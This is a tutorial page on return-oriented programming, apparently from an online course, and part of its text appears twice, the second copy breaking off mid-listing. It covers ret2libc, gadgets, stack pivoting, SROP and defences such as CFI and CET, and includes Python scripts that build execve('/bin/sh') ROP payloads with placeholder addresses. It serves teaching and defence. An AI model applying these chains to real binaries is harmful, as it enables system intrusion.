Operating SystemsBuffer Overflow Attacks

Buffer Overflow Attacks

LevelAdvanced

Duration90 mins

TopicBuffer Overflow Attacks

4 / 5

Return-Oriented Programming

Programming Without Code

In 2007, Hovav Shacham published a paper titled "The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls" at CCS (ACM Conference on Computer and Communications Security). This work formally introduced Return-Oriented Programming (ROP)—a technique that fundamentally changed the landscape of exploitation.

ROP offered a profound insight: with control over the stack, an attacker doesn't need to inject code. Instead, they can chain together fragments of existing, legitimate code to achieve arbitrary computation. Each fragment—called a "gadget"—ends with a ret instruction, which pops the next address from the stack, allowing the attacker to chain fragments indefinitely.

The implications were staggering. Data Execution Prevention (DEP), which marked the stack and heap non-executable, was no longer an insurmountable barrier. ROP could construct any desired program logic using only code already present in the binary.

What You Will Learn

By the end of this page, you will understand: the theory behind return-oriented programming, how gadgets are identified and chained, ROP chain construction for common tasks, automated gadget finding tools, and the computational power (Turing completeness) of ROP.

The Precursor: Return-to-libc

Before ROP, attackers facing non-executable stacks developed return-to-libc (ret2libc) attacks. The concept was simple: instead of returning to injected shellcode, redirect execution to existing library functions—particularly system() from libc.

How Return-to-libc Works:

Overflow buffer and overwrite return address with address of system() in libc
Set up the stack so that when system() executes, it finds /bin/sh as its argument
system() spawns a shell—using entirely legitimate code

ret2libc_concept.c
Concept
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
// Target function we want to call:
// int system(const char *command);
 
// Stack layout needed for ret2libc (32-bit):
//
// [buffer padding]     <- overflow from here
// [system() address]   <- overwrites saved EIP
// [fake return addr]   <- where system() "returns" (can be exit() or garbage)
// ["/bin/sh" address]  <- argument to system()
//
// When vulnerable function returns:
// 1. EIP = system() address → execution jumps to system()
// 2. system() looks for its argument at ESP+4 → finds "/bin/sh"
// 3. Shell spawns!
 
// On 64-bit, calling convention uses registers:
// RDI = first argument (must contain pointer to "/bin/sh")
// This requires a gadget to load RDI before calling system()

Limitations of Pure Return-to-libc:

Function-level granularity: You can only call complete functions, not arbitrary instruction sequences
Argument passing challenges: On x86-64, arguments go in registers, requiring gadgets to load them
Limited operations: Can only perform what available library functions do
ASLR defeats it: Without knowing libc's address, you can't find system() or /bin/sh

Enter ROP: Return-Oriented Programming generalizes return-to-libc. Instead of calling whole functions, ROP chains tiny code fragments—often just 2-5 instructions—to build arbitrary logic. This overcomes all of return-to-libc's limitations except ASLR (which requires separate bypass).

Historical Context

Return-to-libc was first demonstrated by Solar Designer in 1997 against a non-exec stack Linux patch. It proved that DEP alone was insufficient. ROP, introduced a decade later, elevated the technique from 'bypass' to 'complete alternative programming model.'

Understanding ROP Gadgets

A gadget is a sequence of machine instructions ending in a ret (return) instruction. When chained via the stack, gadgets execute in sequence, each ret transferring control to the next gadget address on the stack.

Anatomy of a Gadget:

gadget_examples.asm

Assembly

;; Example gadgets found in typical binaries
 
;; Gadget 1: Load value from stack into register
pop rdi         ; Pop next stack value into RDI (argument for syscall)
ret             ; Transfer to next gadget
                ; Address: 0x401234
                ; Bytes: 5f c3
 
;; Gadget 2: Load value into RSI
pop rsi         ; Pop into RSI
ret
                ; Address: 0x401236
                ; Bytes: 5e c3
 
;; Gadget 3: Clear a register
xor rax, rax    ; Set RAX = 0
ret
                ; Address: 0x401238
                ; Bytes: 48 31 c0 c3
 
;; Gadget 4: Syscall invocation
mov rax, rdi    ; Sometimes useful data movement
syscall         ; Execute system call
                ; Note: syscall doesn't end in ret, special handling needed
                ; Address: 0x40123c
 
;; Gadget 5: Increment register
inc rax         ; RAX = RAX + 1
ret
                ; Address: 0x401240
                ; Bytes: 48 ff c0 c3
 
;; Gadget 6: Write memory (write-what-where)
mov [rdi], rsi  ; Write RSI value to address in RDI
ret
                ; Address: 0x401244
                ; Bytes: 48 89 37 c3

Key Gadget Categories:

Gadget Taxonomy
Category	Example	Purpose	Commonality
Stack Load	`pop rdi; ret`	Load value from stack to register	Very common
Register Move	`mov rax, rbx; ret`	Copy between registers	Common
Arithmetic	`add rax, rbx; ret`	Computation	Moderately common
Memory Read	`mov rax, [rdi]; ret`	Read from memory	Less common
Memory Write	`mov [rdi], rax; ret`	Write to memory	Critical for exploitation
Syscall/Call	`syscall` or `call rax`	Execute or invoke	Rare but essential
Conditional	`cmp; cmov; ret`	Branching logic	Rare, enables Turing completeness

Unaligned Gadgets

x86 has variable-length instructions. A gadget might exist at an address that isn't an official instruction boundary—you just need valid bytes that decode to useful instructions followed by 0xc3 (ret). Gadget finders scan for these 'unintentional' gadgets that arise from misaligned decoding.

ROP Chain Construction

A ROP chain is a carefully arranged sequence of addresses and data on the stack. When the vulnerable function returns, execution cascades through the gadgets:

Initial overflow overwrites return address with first gadget address
First gadget executes, then hits ret, pops next address from stack
Second gadget executes, and so on...
Final gadget performs the target action (e.g., syscall)

Stack Layout During ROP:

Converting Mermaid diagram...

rop_chain_execve.py
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
#!/usr/bin/env python3
"""
ROP Chain Example: execve("/bin/sh", NULL, NULL)
Target: x86-64 Linux binary with known gadget addresses
"""
 
import struct
 
def p64(value):
    """Pack 64-bit value in little-endian."""
    return struct.pack("<Q", value)
 
# Configuration - these addresses from target binary analysis
BUFFER_SIZE = 128
OFFSET_TO_RET = BUFFER_SIZE + 8 + 8  # buffer + saved_rbp + alignment
 
# Gadget addresses (found using ROPgadget, ropper, etc.)
# These are example addresses - must be from actual binary
POP_RDI_RET = 0x401234          # pop rdi; ret
POP_RSI_RET = 0x401236          # pop rsi; ret  
POP_RDX_RET = 0x401238          # pop rdx; ret
POP_RAX_RET = 0x40123a          # pop rax; ret
SYSCALL     = 0x40123c          # syscall
 
# Data addresses
BIN_SH_ADDR = 0x402000          # Address of "/bin/sh" string in binary
 
# Build the ROP chain
def build_rop_chain():
    chain = b""
    
    # Padding to reach return address
    chain += b"A" * OFFSET_TO_RET
    
    # Gadget 1: pop rdi; ret  →  Load "/bin/sh" address into RDI
    chain += p64(POP_RDI_RET)
    chain += p64(BIN_SH_ADDR)    # Value popped into RDI
    
    # Gadget 2: pop rsi; ret  →  Set RSI = NULL (argv)
    chain += p64(POP_RSI_RET)
    chain += p64(0x0)            # NULL for argv
    
    # Gadget 3: pop rdx; ret  →  Set RDX = NULL (envp)
    chain += p64(POP_RDX_RET)
    chain += p64(0x0)            # NULL for envp
    
    # Gadget 4: pop rax; ret  →  Set RAX = 59 (execve syscall number)
    chain += p64(POP_RAX_RET)
    chain += p64(59)             # execve syscall number
    
    # Gadget 5: syscall  →  Execute execve("/bin/sh", NULL, NULL)
    chain += p64(SYSCALL)
    
    return chain
 
# Build and output
payload = build_rop_chain()
print(f"ROP chain payload: {len(payload)} bytes")
print(f"Offset to return address: {OFFSET_TO_RET}")
print(f"Number of gadgets: 5")
 
# Annotated chain dump
print("\n=== ROP Chain Structure ===")
print(f"[+] Padding: {OFFSET_TO_RET} bytes of 'A'")
print(f"[+] pop rdi; ret @ {hex(POP_RDI_RET)}")
print(f"    → RDI = {hex(BIN_SH_ADDR)} ('/bin/sh')")
print(f"[+] pop rsi; ret @ {hex(POP_RSI_RET)}")
print(f"    → RSI = 0x0 (NULL)")
print(f"[+] pop rdx; ret @ {hex(POP_RDX_RET)}")
print(f"    → RDX = 0x0 (NULL)")
print(f"[+] pop rax; ret @ {hex(POP_RAX_RET)}")
print(f"    → RAX = 59 (execve)")
print(f"[+] syscall @ {hex(SYSCALL)}")
print(f"    → execve('/bin/sh', NULL, NULL)")
 
# Write payload
with open("rop_payload.bin", "wb") as f:
    f.write(payload)
print("\n[*] Payload written to rop_payload.bin")

Gadget Alignment

Each gadget address is followed by any values it consumes (via pop instructions). A 'pop rdi; ret' gadget needs one 8-byte value after its address. A 'pop rdi; pop rsi; ret' gadget needs two. The stack must be precisely structured for the chain to work correctly.

Finding Gadgets

Manually searching for gadgets in binaries is tedious. Fortunately, specialized tools automate gadget discovery by scanning for ret bytes (0xc3) and decoding backwards to find useful instruction sequences.

Popular Gadget-Finding Tools

•ROPgadget — Comprehensive tool supporting many architectures. Can search binaries and generate basic ROP chains automatically. Python-based.
•Ropper — Feature-rich gadget finder with semantic search ('show me gadgets that pop into rdi'). Supports chain generation.
•pwntools ROP module — Integrated into the pwntools framework. Automatic chain building for common scenarios.
•radare2/r2 — Full reverse engineering framework with /R command for gadget search. Powerful but steeper learning curve.
•Angrop — Uses symbolic execution to find and verify gadgets automatically. More sophisticated analysis.

ropgadget_usage.sh
Bash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/bin/bash
# ROPgadget usage examples
 
# Basic: Find all gadgets in a binary
ROPgadget --binary ./vulnerable
 
# Search for specific gadget patterns
ROPgadget --binary ./vulnerable --only "pop|ret"
 
# Find gadgets containing specific register
ROPgadget --binary ./vulnerable | grep "rdi"
 
# Search for syscall gadgets
ROPgadget --binary ./vulnerable | grep "syscall"
 
# Include all loaded libraries (more gadgets, but ASLR affects them)
ROPgadget --binary ./vulnerable --ropchain
 
# Export to file
ROPgadget --binary ./vulnerable > gadgets.txt
 
# Ropper examples
ropper -f ./vulnerable
 
# Semantic search in ropper
ropper -f ./vulnerable --search "pop rdi"
 
# Find all stack pivot gadgets
ropper -f ./vulnerable --search "xchg esp"
 
# Generate ropchain for execve (ropper)
ropper -f ./vulnerable --chain execve

pwntools_rop.py
Python (pwntools)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/usr/bin/env python3
"""
Automated ROP chain building with pwntools
"""
 
from pwn import *
 
# Load the binary
context.binary = elf = ELF('./vulnerable')
 
# Automatically find gadgets and libc (if available)
rop = ROP(elf)
 
# Print found gadgets
print(rop.gadgets)
 
# Find specific gadgets manually
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
print(f"pop rdi; ret @ {hex(pop_rdi)}")
 
# Build ROP chain for execve (if we have needed gadgets)
# pwntools can automate common patterns
 
# Example: Build chain to call a function
# rop.call(elf.symbols['win_function'])
 
# Example: Build chain for execve (with libc)
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# rop.execve(next(libc.search(b'/bin/sh')), 0, 0)
 
# For custom chains, build manually:
rop.raw(pop_rdi)
rop.raw(next(elf.search(b'/bin/sh')))  # If binary contains /bin/sh
# Add more gadgets...
 
# Get the chain as bytes
chain = rop.chain()
print(f"Chain length: {len(chain)}")
 
# Print the chain
print(rop.dump())
 
# Example output:
# 0x0000:         0x401234 pop rdi; ret
# 0x0008:         0x402000 [arg0] '/bin/sh'
# 0x0010:         0x401236 pop rsi; pop r15; ret
# ...

Gadget Quality Matters

Not all gadgets are equally useful. A 'pop rdi; ret' is ideal, but you might only find 'pop rdi; pop rsi; ret' which requires an extra dummy value. Watch for side effects—a gadget that modifies unexpected registers might break your chain. Clean, minimal gadgets are gold.

Advanced ROP Techniques

Basic ROP chains call a single function or syscall. Advanced techniques extend ROP's power to handle complex scenarios.

Advanced Techniques

•Stack Pivoting — Move the stack pointer to attacker-controlled memory. Essential when overflow is small but you've written a long chain elsewhere. Gadgets: xchg esp, eax; ret or leave; ret.
•ROP to mprotect() — Change memory permissions to make a region executable, then jump to injected shellcode. Bypasses DEP by re-enabling execution.
•ROP to mmap() — Allocate new executable memory, copy shellcode there, execute. More complex but very reliable.
•Return-to-dl-resolve — Abuse dynamic linking to resolve arbitrary library functions. Bypasses partial-RELRO, works without info leak.
•Sigreturn-Oriented Programming (SROP) — Use sigreturn syscall to set all registers from a fake signal frame. Single syscall, full register control.

stack_pivot_example.py
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
#!/usr/bin/env python3
"""
Stack Pivot ROP Technique
When overflow buffer is small, pivot stack to larger controlled region
"""
 
from pwn import *
 
def p64(value):
    return struct.pack("<Q", value)
 
# Scenario: We can overflow 32 bytes but need 200-byte ROP chain
# Solution: Write full chain elsewhere, pivot stack there
 
SMALL_OVERFLOW = 32
OFFSET_TO_RET = 24  # Only room for 24 bytes padding + one address
 
# Gadgets
LEAVE_RET = 0x401234         # leave; ret (mov rsp, rbp; pop rbp; ret)
POP_RBP_RET = 0x401236       # pop rbp; ret
 
# Address where we've written our full ROP chain
# (via environment variable, heap, secondary buffer, etc.)
PIVOT_TARGET = 0x7fffffffe000  # Stack address containing full chain
 
def build_pivot_payload():
    """
    Small payload that pivots stack to PIVOT_TARGET
    
    leave; ret does:
      mov rsp, rbp    ; RSP = RBP (we control RBP via overflow)
      pop rbp         ; Pop from new stack location
      ret             ; Return from new stack location
    
    So we set RBP to point to our full chain - 8
    """
    payload = b""
    payload += b"A" * OFFSET_TO_RET
    
    # Overwrite saved RBP with (PIVOT_TARGET - 8)
    # After leave: RSP = RBP, then pop rbp consumes 8 bytes
    # Then ret reads from RSP = PIVOT_TARGET
    payload += p64(PIVOT_TARGET - 8)  # New RBP value
    
    # Overwrite return address with leave; ret gadget
    payload += p64(LEAVE_RET)
    
    return payload
 
# The full ROP chain that lives at PIVOT_TARGET
def build_full_chain():
    """Full ROP chain for execve, stored at PIVOT_TARGET"""
    chain = b""
    chain += p64(0xdeadbeef)          # Dummy value popped into RBP by leave
    chain += p64(POP_RDI_RET)         # pop rdi; ret
    chain += p64(BIN_SH_ADDR)         # "/bin/sh"
    chain += p64(POP_RSI_RET)         # pop rsi; ret
    chain += p64(0)                   # NULL
    chain += p64(POP_RDX_RET)         # pop rdx; ret
    chain += p64(0)                   # NULL
    chain += p64(POP_RAX_RET)         # pop rax; ret
    chain += p64(59)                  # execve
    chain += p64(SYSCALL)             # syscall
    return chain
 
# Usage:
# 1. Place full_chain at PIVOT_TARGET (via other means)
# 2. Use small pivot_payload in vulnerable overflow
# 3. Execution pivots to full_chain, executes complete ROP
 
print("=== Stack Pivot Payload ===")
print(f"Pivot payload size: {len(build_pivot_payload())} bytes")
print(f"Full chain size: {len(build_full_chain())} bytes")
print(f"Stack pivots to: {hex(PIVOT_TARGET)}")

Sigreturn-Oriented Programming (SROP)

SROP is elegantly simple: when the kernel returns from handling a signal, it uses the sigreturn syscall to restore register state from a frame on the stack. If an attacker can place a fake signal frame on the stack and invoke sigreturn, they control all registers in a single syscall—including RIP (instruction pointer) and RSP (stack pointer).

This is particularly powerful because you only need a single gadget: syscall with RAX=15 (sigreturn). The fake frame provides all register values.

SROP in Practice

SROP requires the ability to set RAX=15 before hitting the syscall gadget. Many exploits combine SROP with limited ROP to set RAX. Once sigreturn executes, you have arbitrary register control including RIP—equivalent to executing any instruction. pwntools has SigreturnFrame() to automate fake frame construction.

ROP and Turing Completeness

A profound result from Shacham's original ROP paper: ROP is Turing-complete. Given a sufficient gadget set, an attacker can implement any computable function through ROP chains alone—without injecting a single new instruction.

Minimum Gadget Sets for Turing Completeness:

To achieve Turing completeness, a gadget catalog needs:

Loading constants — Move values from stack to registers
Arithmetic operations — At minimum, addition and negation (for subtraction)
Logical operations — AND, OR, XOR, NOT
Memory access — Load from and store to arbitrary addresses
Flow control — Conditional execution (can be simulated with memory tricks)

Minimal Gadget Set for Turing Completeness
Operation	Example Gadget	Provides
Load immediate	`pop rax; ret`	Constants from stack to register
Move	`mov rax, rbx; ret`	Data movement between registers
Add	`add rax, rbx; ret`	Arithmetic capability
Memory load	`mov rax, [rbx]; ret`	Read arbitrary memory
Memory store	`mov [rax], rbx; ret`	Write arbitrary memory
Conditional	`cmp;cmovz; ret`	Branching (or use indirect dispatch)
Indirect jump	`jmp [rax]` or computed ret	Dynamic control flow

Practical Implications:

Arbitrary payloads without new code: Entire malware (if somehow expressed) could be a ROP chain
Evasion of code-based detection: No shellcode bytes to signature-match
Defense complexity: You cannot simply 'block new code execution'—the attacker uses your own code
Attackers rarely need full Turing completeness: In practice, calling system() or execve() suffices

Conditional Execution in ROP

True conditionals in ROP are challenging because RET always pops the next address—there's no je equivalent. Techniques include:

Conditional memory writes: Write different addresses to jump table locations
CMOV gadgets: Conditionally move addresses to stack locations
Self-modifying chains: Update chain in memory based on conditions
Indirect dispatch: Load jump target from memory, where value depends on condition

JOP and COP

Return-oriented programming has siblings: Jump-Oriented Programming (JOP) uses gadgets ending in indirect jumps, and Call-Oriented Programming (COP) uses gadgets ending in indirect calls. These avoid RET entirely, potentially evading RET-focused defenses. The fundamental principle—reusing existing code fragments—is the same.

Defenses Against ROP

ROP's power prompted significant research into defenses. No single defense is comprehensive, but layering multiple mitigations significantly raises the exploitation bar.

ROP Mitigation Strategies

•ASLR (Address Space Layout Randomization) — Randomize where code is loaded. Attacker doesn't know gadget addresses. Bypass: info leak to discover base address.
•Stack Canaries — Detect overflow before return. Doesn't prevent ROP directly but makes triggering it harder. Bypass: leak canary, avoid canary with different vuln.
•Shadow Stacks — Maintain separate stack for return addresses; verify return destination matches. Highly effective but has runtime cost.
•Control Flow Integrity (CFI) — Verify that indirect jumps/calls/returns go to valid targets. Restricts available gadgets significantly.
•CET (Intel Control-flow Enforcement) — Hardware-based shadow stack. Very low overhead. Newer CPUs only.
•Compiler-based transformations — Eliminate or reduce gadgets during compilation (e.g., G-Free, return-less binaries).

Effective Defenses

•Shadow stacks + CET (high assurance)
•Fine-grained CFI (Microsoft CFG)
•Strong ASLR (no info leaks)
•Memory-safe languages (Rust)

Bypassable Defenses

•Coarse-grained CFI (limited target sets)
•ASLR without info leak prevention
•Stack canaries alone
•ROP-detection heuristics

Control Flow Integrity (CFI) in Detail

CFI restricts where indirect control transfers can go:

Forward-edge CFI: Restricts indirect calls/jumps to valid function entry points
Backward-edge CFI: Restricts returns to valid return sites (shadow stacks implement this)

Coarse-grained CFI (e.g., early Windows CFG) allows returns to any return instruction, which still permits many ROP gadgets. Fine-grained CFI with context-sensitive return tracking approaches completeness but has higher overhead.

Intel CET implements hardware shadow stacks: returns are validated against a hardware-protected shadow; corrupt returns trigger exceptions. This is the most practical backward-edge CFI available today.

Defense in Depth

No single defense is sufficient. Modern secure systems layer: ASLR + stack canaries + DEP + CFI + shadow stacks. Each defense forces attackers to chain more vulnerabilities, raising the cost of exploitation significantly. The goal isn't perfect security but raising the bar above attacker capabilities.

Summary: Mastering Return-Oriented Programming

We've explored Return-Oriented Programming—the technique that transformed exploitation after DEP. Let's consolidate the key insights.

Key Takeaways

•ROP chains existing code fragments (gadgets) — Each gadget ends in RET, transferring control to the next gadget address on the stack.
•Gadgets are found in legitimate binaries — No new code is injected; ROP uses what's already there, defeating DEP.
•The stack becomes a program — Carefully arranged addresses and values on the stack control execution flow.
•Automated tools find gadgets — ROPgadget, Ropper, and pwntools automate the tedious work of gadget discovery and chain construction.
•Advanced techniques extend ROP's reach — Stack pivoting, SROP, and ret2dl-resolve handle complex scenarios.
•ROP is Turing-complete — Given sufficient gadgets, any computation is possible without injected code.
•Defense requires layered mitigations — CFI, shadow stacks, and CET significantly constrain ROP, though no single defense is complete.

What's Next: Prevention Techniques

The final page of this module explores prevention techniques—the comprehensive set of defenses designed to prevent buffer overflows from occurring or being exploitable. We'll examine compiler protections, OS mitigations, and secure coding practices that raise the cost of exploitation to impractical levels.

Page Complete

You now understand Return-Oriented Programming: how it works, why it defeats DEP, and how chains are constructed. This technique represents the current state of the art in buffer overflow exploitation, and understanding it is essential for both offensive security research and defensive engineering.

4 / 5

Loading learning content...

Operating SystemsBuffer Overflow Attacks

Buffer Overflow Attacks

LevelAdvanced

Duration90 mins

TopicBuffer Overflow Attacks

4 / 5

Return-Oriented Programming

Programming Without Code

What You Will Learn

The Precursor: Return-to-libc

How Return-to-libc Works:

Overflow buffer and overwrite return address with address of system() in libc
Set up the stack so that when system() executes, it finds /bin/sh as its argument
system() spawns a shell—using entirely legitimate code

ret2libc_concept.c
Concept
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
// Target function we want to call:
// int system(const char *command);
 
// Stack layout needed for ret2libc (32-bit):
//
// [buffer padding]     <- overflow from here
// [system() address]   <- overwrites saved EIP
// [fake return addr]   <- where system() "returns" (can be exit() or garbage)
// ["/bin/sh" address]  <- argument to system()
//
// When vulnerable function returns:
// 1. EIP = system() address → execution jumps to system()
// 2. system() looks for its argument at ESP+4 → finds "/bin/sh"
// 3. Shell spawns!
 
// On 64-bit, calling convention uses registers:
// RDI = first argument (must contain pointer to "/bin/sh")
// This requires a gadget to load RDI before calling system()

Limitations of Pure Return-to-libc:

Function-level granularity: You can only call complete functions, not arbitrary instruction sequences
Argument passing challenges: On x86-64, arguments go in registers, requiring gadgets to load them
Limited operations: Can only perform what available library functions do
ASLR defeats it: Without knowing libc's address, you can't find system() or /bin/sh

Historical Context

Understanding ROP Gadgets

Anatomy of a Gadget:

gadget_examples.asm

Assembly

;; Example gadgets found in typical binaries
 
;; Gadget 1: Load value from stack into register
pop rdi         ; Pop next stack value into RDI (argument for syscall)
ret             ; Transfer to next gadget
                ; Address: 0x401234
                ; Bytes: 5f c3
 
;; Gadget 2: Load value into RSI
pop rsi         ; Pop into RSI
ret
                ; Address: 0x401236
                ; Bytes: 5e c3
 
;; Gadget 3: Clear a register
xor rax, rax    ; Set RAX = 0
ret
                ; Address: 0x401238
                ; Bytes: 48 31 c0 c3
 
;; Gadget 4: Syscall invocation
mov rax, rdi    ; Sometimes useful data movement
syscall         ; Execute system call
                ; Note: syscall doesn't end in ret, special handling needed
                ; Address: 0x40123c
 
;; Gadget 5: Increment register
inc rax         ; RAX = RAX + 1
ret
                ; Address: 0x401240
                ; Bytes: 48 ff c0 c3
 
;; Gadget 6: Write memory (write-what-where)
mov [rdi], rsi  ; Write RSI value to address in RDI
ret
                ; Address: 0x401244
                ; Bytes: 48 89 37 c3

Key Gadget Categories:

Gadget Taxonomy
Category	Example	Purpose	Commonality
Stack Load	`pop rdi; ret`	Load value from stack to register	Very common
Register Move	`mov rax, rbx; ret`	Copy between registers	Common
Arithmetic	`add rax, rbx; ret`	Computation	Moderately common
Memory Read	`mov rax, [rdi]; ret`	Read from memory	Less common
Memory Write	`mov [rdi], rax; ret`	Write to memory	Critical for exploitation
Syscall/Call	`syscall` or `call rax`	Execute or invoke	Rare but essential
Conditional	`cmp; cmov; ret`	Branching logic	Rare, enables Turing completeness

Unaligned Gadgets

ROP Chain Construction

A ROP chain is a carefully arranged sequence of addresses and data on the stack. When the vulnerable function returns, execution cascades through the gadgets:

Initial overflow overwrites return address with first gadget address
First gadget executes, then hits ret, pops next address from stack
Second gadget executes, and so on...
Final gadget performs the target action (e.g., syscall)

Stack Layout During ROP:

Converting Mermaid diagram...

rop_chain_execve.py
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
#!/usr/bin/env python3
"""
ROP Chain Example: execve("/bin/sh", NULL, NULL)
Target: x86-64 Linux binary with known gadget addresses
"""
 
import struct
 
def p64(value):
    """Pack 64-bit value in little-endian."""
    return struct.pack("<Q", value)
 
# Configuration - these addresses from target binary analysis
BUFFER_SIZE = 128
OFFSET_TO_RET = BUFFER_SIZE + 8 + 8  # buffer + saved_rbp + alignment
 
# Gadget addresses (found using ROPgadget, ropper, etc.)
# These are example addresses - must be from actual binary
POP_RDI_RET = 0x401234          # pop rdi; ret
POP_RSI_RET = 0x401236          # pop rsi; ret  
POP_RDX_RET = 0x401238          # pop rdx; ret
POP_RAX_RET = 0x40123a          # pop rax; ret
SYSCALL     = 0x40123c          # syscall
 
# Data addresses
BIN_SH_ADDR = 0x402000          # Address of "/bin/sh" string in binary
 
# Build the ROP chain
def build_rop_chain():
    chain = b""
    
    # Padding to reach return address
    chain += b"A" * OFFSET_TO_RET
    
    # Gadget 1: pop rdi; ret  →  Load "/bin/sh" address into RDI
    chain += p64(POP_RDI_RET)
    chain += p64(BIN_SH_ADDR)    # Value popped into RDI
    
    # Gadget 2: pop rsi; ret  →  Set RSI = NULL (argv)
    chain += p64(POP_RSI_RET)
    chain += p64(0x0)            # NULL for argv
    
    # Gadget 3: pop rdx; ret  →  Set RDX = NULL (envp)
    chain += p64(POP_RDX_RET)
    chain += p64(0x0)            # NULL for envp
    
    # Gadget 4: pop rax; ret  →  Set RAX = 59 (execve syscall number)
    chain += p64(POP_RAX_RET)
    chain += p64(59)             # execve syscall number
    
    # Gadget 5: syscall  →  Execute execve("/bin/sh", NULL, NULL)
    chain += p64(SYSCALL)
    
    return chain
 
# Build and output
payload = build_rop_chain()
print(f"ROP chain payload: {len(payload)} bytes")
print(f"Offset to return address: {OFFSET_TO_RET}")
print(f"Number of gadgets: 5")
 
# Annotated chain dump
print("\n=== ROP Chain Structure ===")
print(f"[+] Padding: {OFFSET_TO_RET} bytes of 'A'")
print(f"[+] pop rdi; ret @ {hex(POP_RDI_RET)}")
print(f"    → RDI = {hex(BIN_SH_ADDR)} ('/bin/sh')")
print(f"[+] pop rsi; ret @ {hex(POP_RSI_RET)}")
print(f"    → RSI = 0x0 (NULL)")
print(f"[+] pop rdx; ret @ {hex(POP_RDX_RET)}")
print(f"    → RDX = 0x0 (NULL)")
print(f"[+] pop rax; ret @ {hex(POP_RAX_RET)}")
print(f"    → RAX = 59 (execve)")
print(f"[+] syscall @ {hex(SYSCALL)}")
print(f"    → execve('/bin/sh', NULL, NULL)")
 
# Write payload
with open("rop_payload.bin", "wb") as f:
    f.write(payload)
print("\n[*] Payload written to rop_payload.bin")

Gadget Alignment

Finding Gadgets

Popular Gadget-Finding Tools

•ROPgadget — Comprehensive tool supporting many architectures. Can search binaries and generate basic ROP chains automatically. Python-based.
•Ropper — Feature-rich gadget finder with semantic search ('show me gadgets that pop into rdi'). Supports chain generation.
•pwntools ROP module — Integrated into the pwntools framework. Automatic chain building for common scenarios.
•radare2/r2 — Full reverse engineering framework with /R command for gadget search. Powerful but steeper learning curve.
•Angrop — Uses symbolic execution to find and verify gadgets automatically. More sophisticated analysis.

ropgadget_usage.sh
Bash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/bin/bash
# ROPgadget usage examples
 
# Basic: Find all gadgets in a binary
ROPgadget --binary ./vulnerable
 
# Search for specific gadget patterns
ROPgadget --binary ./vulnerable --only "pop|ret"
 
# Find gadgets containing specific register
ROPgadget --binary ./vulnerable | grep "rdi"
 
# Search for syscall gadgets
ROPgadget --binary ./vulnerable | grep "syscall"
 
# Include all loaded libraries (more gadgets, but ASLR affects them)
ROPgadget --binary ./vulnerable --ropchain
 
# Export to file
ROPgadget --binary ./vulnerable > gadgets.txt
 
# Ropper examples
ropper -f ./vulnerable
 
# Semantic search in ropper
ropper -f ./vulnerable --search "pop rdi"
 
# Find all stack pivot gadgets
ropper -f ./vulnerable --search "xchg esp"
 
# Generate ropchain for execve (ropper)
ropper -f ./vulnerable --chain execve

pwntools_rop.py
Python (pwntools)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/usr/bin/env python3
"""
Automated ROP chain building with pwntools
"""
 
from pwn import *
 
# Load the binary
context.binary = elf = ELF('./vulnerable')
 
# Automatically find gadgets and libc (if available)
rop = ROP(elf)
 
# Print found gadgets
print(rop.gadgets)
 
# Find specific gadgets manually
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
print(f"pop rdi; ret @ {hex(pop_rdi)}")
 
# Build ROP chain for execve (if we have needed gadgets)
# pwntools can automate common patterns
 
# Example: Build chain to call a function
# rop.call(elf.symbols['win_function'])
 
# Example: Build chain for execve (with libc)
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# rop.execve(next(libc.search(b'/bin/sh')), 0, 0)
 
# For custom chains, build manually:
rop.raw(pop_rdi)
rop.raw(next(elf.search(b'/bin/sh')))  # If binary contains /bin/sh
# Add more gadgets...
 
# Get the chain as bytes
chain = rop.chain()
print(f"Chain length: {len(chain)}")
 
# Print the chain
print(rop.dump())
 
# Example output:
# 0x0000:         0x401234 pop rdi; ret
# 0x0008:         0x402000 [arg0] '/bin/sh'
# 0x0010:         0x401236 pop rsi; pop r15; ret
# ...

Gadget Quality Matters

Advanced ROP Techniques

Basic ROP chains call a single function or syscall. Advanced techniques extend ROP's power to handle complex scenarios.

Advanced Techniques

•Stack Pivoting — Move the stack pointer to attacker-controlled memory. Essential when overflow is small but you've written a long chain elsewhere. Gadgets: xchg esp, eax; ret or leave; ret.
•ROP to mprotect() — Change memory permissions to make a region executable, then jump to injected shellcode. Bypasses DEP by re-enabling execution.
•ROP to mmap() — Allocate new executable memory, copy shellcode there, execute. More complex but very reliable.
•Return-to-dl-resolve — Abuse dynamic linking to resolve arbitrary library functions. Bypasses partial-RELRO, works without info leak.
•Sigreturn-Oriented Programming (SROP) — Use sigreturn syscall to set all registers from a fake signal frame. Single syscall, full register control.

stack_pivot_example.py
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
